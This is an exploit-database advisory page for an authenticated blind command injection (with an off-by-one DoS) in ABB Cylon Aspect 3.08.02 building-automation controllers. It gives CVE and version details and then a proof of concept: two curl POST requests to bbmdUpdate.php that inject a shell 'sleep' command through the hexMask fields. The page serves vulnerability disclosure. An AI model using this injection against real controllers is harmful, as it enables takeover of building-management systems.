ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution

vendor:

Cylon Aspect

by:

Gjoko 'LiquidWorm' Krstic

6.1

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Cylon Aspect

Affected Version From: 03.08.02

Affected Version To: 03.08.02

Patch Exists: NO

Related CWE: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550

CPE: a:abb_ltd:cylon_aspect:3.08.02

Metasploit:

Other Scripts:

Platforms Tested: GNU/Linux, Intel processors, PHP, AspectFT Automation Application Server, lighttpd, Apache, OpenJDK, ErgoTech MIX Deployment Server

2024

ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) – Remote Code Execution

The ABB Cylon Aspect BMS/BAS controller in version 3.08.02 and below is vulnerable to an authenticated blind command injection. Attackers can execute arbitrary shell commands by manipulating input in certain POST parameters. Additionally, an off-by-one error in array access can result in undefined behavior and potential Denial of Service (DoS) attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to update the ABB Cylon Aspect BMS/BAS controller to a version that includes a patch addressing the command injection and array access issues.

Source

Exploit-DB raw data:

ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
blind command injection vulnerability. Input passed to several POST parameters
is not properly sanitized when writing files, allowing attackers to execute
arbitrary shell commands on the system. There is also an off-by-one error in
array access that could lead to undefined behavior and potential DoS.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5903
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php
CVE ID: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2&\
> ip1=192.168.1.1&\
> port1=47808&\
> hexMask1=0xFFFF&\
> remove1=0&\
> ip2=192.168.1.2&\
> port2=47809&\
> hexMask2=0xFFFF; sleep 17; #&\
> remove2=0&\
> submit=Submit

$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCountNAT=2&\
> NATip1=192.168.1.1&\
> NATport1=2222&\
> NAThexMask1=0xFFFF&\
> NATremove1=7&\
> NATip2=192.168.1.2&\
> NATport2=2223&\
> NAThexMask2=0xFFFF; sleep 17; #&\
> NATremove2=0&\
> submit=Submit